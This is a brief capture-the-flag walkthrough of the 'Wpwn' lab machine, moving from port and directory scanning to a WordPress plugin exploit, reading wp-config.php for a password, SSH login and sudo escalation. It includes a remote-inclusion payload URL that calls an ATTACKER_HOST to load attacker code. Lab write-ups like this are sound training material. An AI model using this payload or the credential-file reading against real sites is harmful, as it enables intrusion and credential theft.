Wpwn OffSec Walkthrough: This is a walkthrough of Wpwn from offensive security playground. Let us see how we can compromise this machine. Its Available in OffSec Play and Vulnhub.
Reconnaissance
We run nmap scan to see which ports are open and which services are running on those ports.
We get back the following result showing multiple open ports:
- Port 22: OpenSSH 7.9p1
- Port 80: http
Enumeration
- Port 80: On visiting the website we are not presented with much information
- Let’s use gobuster and see if anything comes up.
- We found only one directory and on visiting /wordpress, we are presented with below page
- After this I ran wpscan and got a vulnerable plugin.
Exploitation
- We will use https://www.exploit-db.com/exploits/46794
- Exploitation POC: https://wpscan.com/vulnerability/9259
- As suggested in the POC, I created a file and started python Http server.
- Vulnerable URL: http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt
- We got a valid user: takis
- Now we will read the “wp-config.php” file.
- Read the file and we got a potential password : R3&]vzhHmMn9,:-5
- Tried ssh with user takis and got a user privilege shell.
Privilege Escalation
- Checked user privileges using the command “sudo -l”
- User can run any command without a password, we escalate the privileges using the command “sudo su” and we get the root shell of the target machine.
Finally this lab solved see you on next lab 😉
Also Read | Inclusiveness OffSec Walkthrough
